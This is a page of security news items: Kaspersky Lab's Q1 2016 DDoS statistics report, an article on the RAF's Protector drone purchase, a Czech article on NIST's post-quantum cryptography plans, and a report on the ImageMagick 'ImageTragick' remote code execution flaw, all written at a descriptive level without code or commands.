DDoS attacks using amplification/reflection techniques are still popular and allow cybercriminals to break their peak power records. From a technical point of view, amplification methods are nothing new in DDoS attacks, but cybercriminals are discovering new ways and resources to enhance the capacity of their botnets. For example, according to a recently published report, 2015 saw the largest ever DDoS attack on record at 450-500 Gbps.
DDoS attack on Trump
It’s possible that last year’s record didn’t last very long – at the very beginning of the year the official website of Donald Trump’s election campaign were subjected to DDoS attacks whose strength, according to unconfirmed sources, reached 602 Gbps. The hacktivist group New World Hacking claimed responsibility for both incidents.
Use of the DNSSEC protocol
Criminals are increasingly using the DNSSEC protocol to carry out DDoS attacks. The protocol is intended to minimize DNS spoofing attacks, but besides the domain data a standard DNSSEC reply also contains additional authentication information. Thus, unlike a standard DNS reply of 512 bytes, the DNSSEC reply comes to about 4096 bytes. Attackers exploit this feature to perform amplification DDoS attacks. They usually use domains in the government zone .gov, because in the US such domains are required by law to maintain DNSSEC.
Pingback attacks on WordPress
Web resources powered by the WordPress content management system (CMS) are still popular with cybercriminals carrying out DDoS attacks. Popular CMS-based resources often become targets of DDoS attacks exploiting the WordPress pingback function. The pingback function notifies the author of a post published on a WordPress site when someone else links to that post on another site running the same CMS. If the administrator of the site running WordPress has enabled the function, all links leading to the materials published on a site can perform a so-called pingback, i.e. send a special XML-RPC request to the original site. A huge number of pingback requests sent to the original site can cause a “denial of service”. This feature continues to attract the attention of cybercriminals and helps them perform DDoS attacks at the application level.
Linux Mint hacking
On 21 February 2016, the head of Linux Mint, Clement Lefebvre, reported that someone had managed to hack the project infrastructure including its official website and forum, and substituted the link to the legitimate ISO image of the Linux Mint 17.3 Cinnamon edition with their own URL. The hacker’s modified ISO contained malicious code that used infected machines to perform DDoS attacks.
Attacks on security companies
Cybercriminals also target companies working in information security, with most of the major players – especially those offering anti-DDoS services – having to regularly combat DDoS attacks on their resources. These attacks can’t cause much damage because all these resources are well-protected, but that doesn’t stop the cybercriminals.
In Q1 2016, resources in 74 countries were targeted by #DDoS attacks #KLreport
Tweet
In general, cybercriminals don’t go all out to bring down an IT security company’s site. The attacks tend not to last long, and in most cases, they are terminated as soon as the source notices that protection systems are working. The cybercriminals don’t want to waste their botnet resources when they could be earning money elsewhere. Nevertheless, the attacks continue.
Analysis of the correspondence on underground forums suggests that the criminal fraternity uses the websites of IT security companies as test bed, i.e. to test new methods and tools. This approach is no worse than others, but it does give us some valuable information. If worldwide DDoS statistics show the current state of things, then attacks on IT security companies allow us to some extent to predict the future of DDoS.
Data on the tactics, strength and types of attacks targeting Kaspersky Lab sites also allows us to forecast the trends in the DDoS industry for the coming months.
Once again, we have had to deal with amplification attacks. Their number has declined slightly compared to last year, but their maximum strength has increased fourfold. This confirms the trend of a general strengthening of these attacks – the criminals have to increase the strength to overcome protection measures used by Internet providers and information security companies. In our case, none of these attacks led to our sites being unavailable.
In Q1 2016, 93.6% of resources targeted by #DDoS attacks, were located in 10 countries #KLreport
Tweet
Considering the number of attacks on Kaspersky Lab resources in the first quarter of 2016, the “cream” of the cybercriminal community has gone back to the good old methods of attacks at the application level. Already in the first quarter of this year, we combated several times more HTTP(s) attacks than we did in the whole of 2015. Interestingly, there were several application-layer attacks performed simultaneously against a number of Kaspersky Lab resources. The strength of the DDoS resources was spread between several targets, reducing the effect on each target. This is most probably because the aim was not to disrupt Kaspersky Lab’s sites but to test tools and to see how we responded. The longest attack of this type lasted less than six hours.
We can assume that the proportion of Data Link layer attacks will gradually decline, and application-layer and multi-layer attacks (a combination of hardware and application-layer attacks) will come to the fore.
Powerful UDP amplification attacks came into general use a few years ago and are still a favorite tool of cybercriminals. The reasons for their popularity are clear: they are relatively easy to perform, they can be very powerful with a relatively small botnet, they often involve a third party, and it is extremely difficult to detect the source of the attack.
Although in Q1 of 2016 our Kaspersky DDoS Prevention service continued to combat UDP amplification attacks, we believe that they will gradually disappear. The once daunting task of combining the efforts of Internet providers and IT security companies to effectively filter the junk traffic generated by UDP attacks is almost solved. Having faced the risk of their main channels being clogged up due to large volumes of UDP packets, providers have acquired the necessary equipment and skills and cut this traffic off at the root. This means amplification attacks on a Data Link Layer are becoming less effective and, as a result, less profitable.
In Q1 2016, the largest numbers of #DDoS attacks targeted victims in #China, the #USA & #SouthKorea #KLReport
Tweet
To execute application-layer attacks on web services, large botnets or several high-performance servers and a wide output channel are required, as well as thorough preparatory work to study the target and find its vulnerabilities. Without this, they are ineffective. If the application-layer attack is carried out properly, it is difficult to counter it without blocking access to legitimate users – malicious requests look authentic and every bot faithfully fulfills the connection procedure. The only anomaly is the high demand for the service. We registered these sorts of attempts in the first quarter. This suggests that the DDoS market has developed so that complex, expensive attacks are becoming cost-effective, and better qualified cybercriminals are trying to make money using them.
Moreover, there is a real danger of these methods being used by cybercriminals en masse – the more popular the technique, the more tools are offered for it on the black market. And if application-layer attacks really do become widespread, we should expect to see a growth in the number of customers for this type of DDoS attack and more competent attackers.
Statistics for botnet-assisted DDoS attacks
Methodology
Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system.
The DDoS Intelligence system (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.
This report contains the DDoS Intelligence statistics for the first quarter of 2016.
In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.
The longest #DDoS attack in Q1 2016 lasted for 197 hours (or 8.2 days) #KLreport
Tweet
The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.
It is important to note that DDoS Intelligence statistics are limited to those botnets that were detected and analyzed by Kaspersky Lab. It should also be highlighted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.
Q1 Summary
In Q1, resources in 74 countries were targeted by DDoS attacks (vs. 69 in Q4 of 2015).
93.6% of the targeted resources were located in 10 countries.
China, the US and South Korea remained the leaders in terms of number of DDoS attacks and number of targets. France and Germany were newcomers to the Top 10.
The longest DDoS attack in Q1 2016 lasted for 197 hours (or 8.2 days) which is far less than the previous quarter’s maximum (13.9 days). Multiple attacks on the same target became more frequent (up to 33 attacks on one resource during the reporting period).
SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios, while the number of UDP attacks continues to fall from quarter to quarter.
Overall, command servers remained located in the same countries as the previous quarter, but Europe’s contribution increased – the number of C&C servers in the UK and France grew noticeably.
Geography of attacks
In Q1 2016, the geography of DDoS attacks narrowed to 74 countries.
93.6% of targeted resources were located in 10 countries.
Distribution of DDoS attacks by country, Q1 2016 vs. Q4 2015
The Top 3 most targeted countries remained unchanged. However, South Korea’s share grew from 18.4% to 20.4% while the US’s contribution dropped by 2.2 percentage points. Also of note is the fact that Q1 2016 saw an increase in the number of attacks targeting resources in Ukraine – from 0.3% to 2.0%.
The statistics show that 94.7% of all attacks had targets within the Top 10 most targeted countries:
Distribution of unique DDoS attack targets by country, Q1 2016 vs. Q4 2015
The number of targets in South Korea increased by 3.4 percentage points. China’s share fell from 50.3% in Q4 2015 to 49.7% in the first three months of 2016. The percentage of DDoS attacks targeting resources in the United States also decreased (9.6% in Q1 2016 vs. 12.8% in Q4 2016). Despite the change in figures, South Korea, China and the US maintained their positions in the Top 3, coming well ahead of all other countries.
SYN #DDoS, TCP DDoS & HTTP DDoS remain the most common DDoS attack scenarios in Q1 2016 #KLreport
Tweet
The first quarter of 2016 saw Ukraine enter the Top 5 DDoS targets: its share grew from an insignificant 0.5% at the end of last year to 1.9% in Q1 2016.
Taiwan and the Netherlands’ share fell 0.8 and 0.7 percentage points respectively, meaning both dropped out of the Top 10 most attacked countries.
Changes in DDoS attack numbers
In Q1 2016, DDoS activity was distributed more or less evenly, with the exception of one peak on 6 February. The peak number of attacks in one day was 1,272, recorded on 31 March.
Number of DDoS attacks over time* in Q1 2016.
* DDoS attacks may last for several days. In this timeline, the same attack can be counted several times, i.e. one time for each day of its duration.
As in the previous quarter, Monday (16.5% of attacks) was the most active day of the week for DDoS attacks. Thursday moved up to second (16.2%). Tuesday, which was in second place in Q4 2015 (from 16.4% to 13.4%), became the quietest day of the week in terms of DDoS attacks.
Distribution of DDoS attack numbers by day of the week
Types and duration of DDoS attacks
The ranking of the most popular attack methods remained constant from quarter to quarter. Those used most often were the SYN DDoS method, although its share fell compared to the previous quarter (57.0% vs 54.9%), and TCP DDoS which fell by 0.7 percentage point. The proportion of ICMP DDoS attacks grew significantly, rising to 9%; however, it did not affect the order of the Top 5.
Distribution of DDoS attacks by type
Noticeably, the figure for UDP DDoS has fallen continually over the last year: from 11.1% in Q2 2015 to 1.5% in Q1 2016.
Like the previous quarter, about 70% of attacks lasted no more than 4 hours. At the same time, the maximum duration of attacks decreased considerably. The longest DDoS attack in the last quarter of 2015 lasted for 333 hours; in Q1 2016, the longest registered attack ended after 197 hours.
Distribution of DDoS attacks by duration (hours)
C&C servers and botnet types
In Q1, South Korea remained the leader in terms of the number of C&C servers located on its territory, with its share growing from 59% in the previous quarter to 67.7% in the first quarter of 2016.
China came second; its share grew from 8.3% to 9.5%. As a result, China pushed the US down to third (6.8% vs 11.5% in Q4 of 2015). For the first time during the reporting period France appeared in the Top 10 countries hosting the most C&C servers. This correlates with the increased number of attacks in the country.
Distribution of botnet C&C servers by country in Q1 2016
99.73% of DDoS targets in Q1 2016 were attacked by bots belonging to one family. Cybercriminals launched attacks using bots from two different families (used by one or more botnet masters) in just 0.25% of cases. In 0.01% of cases three or more bots were used, mainly from the Sotdas, Xor and BillGates families.
Correlation between attacks launched from Windows and Linux botnets
When it came to the number of attacks launched from Windows and Linux botnets in Q1 2016, Windows-based botnets were the clear leader. For the third quarter in a row, the difference between the share of Windows- and Linux-based attacks was approximately 10 percentage points.
Conclusion
The events of the first quarter of 2016 once again demonstrated that the attackers are not resting on their laurels and are increasing their computing resources to perform DDoS attacks. Amplification scenarios, which have de facto become the standard tool for carrying out a powerful attack, exploit vulnerabilities in new network protocols. The reasons for an attack can vary: from disrupting pre-election campaigns and attacking candidates’ resources to showdowns between competitors on the black market. There have been frequent incidents of DDoS attacks targeting the very organizations that specialize in countering them. With the spread of vulnerable devices and workstations and the abundance of configuration drawbacks at the application level, the cost of a significant attack is going down. Therefore, reliable protection is needed to ensure these attacks are financially unviable for the criminals.
RAF drone fleet will double and will include the new Protector UAVs
4.5.2016
The British Britain will introduce in its fleet of armed surveillance drones a new generation of unmanned aircraft including the new Protector aircraft.
The British Britain will introduce in its fleet of armed surveillance drones a new generation of unmanned aircraft. The overall number of air crafts in the fleet will double, the new aerial vehicles will have significantly improved performance, they will be able to fly for nearly twice as long, equipped with new weaponry and advanced sensors. Protector will be able to stay airborne for more than 40 hours, much more of the actual 25 hours reached by the Reaper.
The RAF will likely adopt from the end of this decade a new General Atomics Certifiable Predator B, aka Protector, for both surveillance and air strike missions.
The UK Ministry of Defence made public details of the £415m contract signed with the Pentagon for the purchase of 20 new drones that will replace the RAF’s 10 existing MQ-9 Reapers.
“The Unmanned Air Systems Team, part of the UK Ministry of Defence (“MoD”), intends to acquire the PROTECTOR Unmanned Aerial System through a Government -Government Foreign Military Sales (FMS) Contract with the US Department of Defence (US DoD).” states the announcement published by the MoD.
Source The Telegraph
The new aircraft is certified to fly in European airspace, this means that Nato and other European organisations could use it for its operations.
“The aircraft is much more capable than its predecessor. It has almost double the endurance of the Reaper so with a fleet of 20 aircraft, this represents an almost quadrupling of the capability, vital given the MoD’s range of commitments and its requirement to respond to emerging crises.” Liz Quintana, director of military sciences at the Royal United Services Institute, said to The Telegraph.
The Protector drone was first announced by David Cameron during last year’s defence review, when the Prime Minister of the United Kingdom explained the importance of the Unmanned Aerial Vehicles in the fight against the Islamic State.
According to the Defence Secretary, the UK Government is also testing new high altitude surveillance drones that can stay aloft for weeks and could be used for intelligence activities.
“will provide cutting edge intelligence gathering capability and help keep our country safe. They are a key part of our £178 billion equipment plan, backed by a defence budget that will increase every year from now until the end of the decade.” said a Ministry of Defence spokeswoman about the Protector drones.
The Ministry of Defence will buy at least two Zephyr 8 aircraft paying them £10.6m, the surveillance drones are designed to fly at 65,000ft, twice as high as an airliner, but weighs only 66lb and is covered in solar panels to keep it charged.
Klasické šifrování už nestačí, kvantové počítače jej rozcupují
4.5.2016 Šifrování
Není tajemstvím, že mnoho z dnes užívaných metod šifrování by ve světě s kvantovými počítači, jejichž masovější nasazení se blíží, bylo zcela nepoužitelných. NIST, respektovaná organizace z oblasti standardů a technologií, hledá, jak z tohoto problému ven.
Právě NIST (National Institute of Standards and Technology) nedávno vydal zprávu, jejímž hlavním tématem byly šifrovací standardy v kvantovém světě. Zpráva naznačuje možnou dlouhodobou strategii, která by se problému vyhnula ještě předtím, než vůbec nastane.
„V poslední době šlo na kvantové počítače mnoho prostředků určených pro výzkum, a každý, od velkých počítačových společností přes vlády, chtějí, aby jejich šifrovací alhoritmy byly, jak my říkáme, ‘kvantově odolné,‘“ vysvětluje matematik NISTu Dustin Moody. „Takže až někdo postaví první kvantový počítač velkého rozsahu, chceme už mít k dispozici algoritmy, které se neprolomí.“
Současná kryptografie se často spoléhá na techniku matematického rozkladu velkých čísel k zajištění bezpečnosti, ale vědci z MIT a rakouské Univerzity Innsbruck nedávno představili, čemu říkají první pětiatomový kvantový počítač, schopný takové šifrovací metody prolomit.
Zatímco tradiční počítače operují s jedničkami a nulami, kvantové počítače se spoléhají na kvantové bity, tzv. „qubity,“ které mohou být zároveň 0 i 1 – tedy ve stavu, kterému říkáme superpozice. A superpozice slibuje obrovskou efektivitu a navýšení výkonu oproti současným počítačům.
Jedno z doporučení ve zprávě NISTu hovoří o tom, že společnosti by se měly soustředit na „kryptografickou obratnost,“ tedy schopnost rychle přejít na jiný druh šifrování -- takový, který bude bezpečnější. Vytvořit tyto bezpečné algoritmy je pak dlouhodobým cílem.
Za účelem dosažení tohoto cíle se vypíše soutěž, v níž členové veřejnosti navrhnou a otestují slibné nové šifrovací metody. Podobná soutěž se přitom už dříve osvědčila – vedla např. k vývoji SHA-3 hashovacích funkcí, používaných pro autentizaci digitálních zpráv. NIST plánuje zahájit novou soutěž během několika málo měsíců.
„Bude to dlouhý proces zahrnující veřejné prověřování algoritmů, odolných vůči kvantové technologii,“ říká Moody. „A nečekáme, že najdeme jen jednoho vítěze.“
Hned několik z dnes běžně fungujících bezpečnostních mechanismů by mohlo být prolomeno kvantovým počítačem, a to např. veřejné šifrovací klíče nebo digitální podpisy, takže bude třeba vytvořit vícero nových alternativ.
Ačkoli jsou kvantové počítače a s nimi související bezpečnostní hrozba ještě vzdálená budoucnost, NIST nehodlá ztrácet čas.
„Historicky trvalo dlouho, než se rozhodlo, že je šifrovací systém dobrý, a než jsme ho zařadili jako standard do produktů na trhu – může to trvat 10 i 20 let,“ pokračuje Moody. „Společnosti začaly reagovat na nové změny, a my cítíme, že je čas začít na tom pracovat.“
Warning — Widely Popular ImageMagick Tool Vulnerable to Remote Code Execution
4.5.2016 Vulnerebility
A serious zero-day vulnerability has been discovered in ImageMagick, a widely popular software tool used by a large number of websites to process user's photos, which could allow hackers to execute malicious code remotely on servers.
ImageMagick is an open-source image processing library that lets users resize, scale, crop, watermarking and tweak images.
The ImageMagick tool is supported by many programming languages, including Perl, C++, PHP, Python, Ruby and is being deployed by Millions of websites, blogs, social media platforms, and popular content management systems (CMS) such as WordPress and Drupal.
Slack security engineer Ryan Huber disclosed a zero-day flaw (CVE-2016–3714) in the ImageMagick image processing library that allows a hacker to execute malicious code on a Web server by uploading maliciously-crafted image.
For example, by uploading a booby-trapped selfie to a web service that uses ImageMagick, an attacker can execute malicious code on the website's server and steal critical information, snoop on user's accounts and much more.
In other words, only those websites are vulnerable that make use of ImageMagick and allow their users to upload images.
The exploit for the vulnerability has been released and named: ImageTragick.
"The exploit for this vulnerability is being used in the wild," Huber wrote in a blog post published Tuesday. "The exploit is trivial, so we expect it to be available within hours of this post."
He added "We have collectively determined that these vulnerabilities are available to individuals other than the person(s) who discovered them. An unknowable number of people having access to these vulnerabilities makes this a critical issue for everyone using this software."
The ImageMagick team has also acknowledged the flaw, saying the recent "vulnerability reports … include possible Remote Code Execution and ability to render files on the local system."
Though the team has not rolled out any security patches, it recommended that website administrators should add several lines of code to configuration files in order to block attacks, at least via the possible exploits.
Web administrators are also recommended to check the 'magic bytes' in files sent to ImageMagick before allowing the image files to be processed on their end.
Magic bytes are the first few bytes of a file used to identify the image type, such as GIF, JPEG, PNG.
The vulnerability will be patched in versions 7.0.1-1 and 6.9.3-10 of ImageMagick, which are due to be released by the weekend.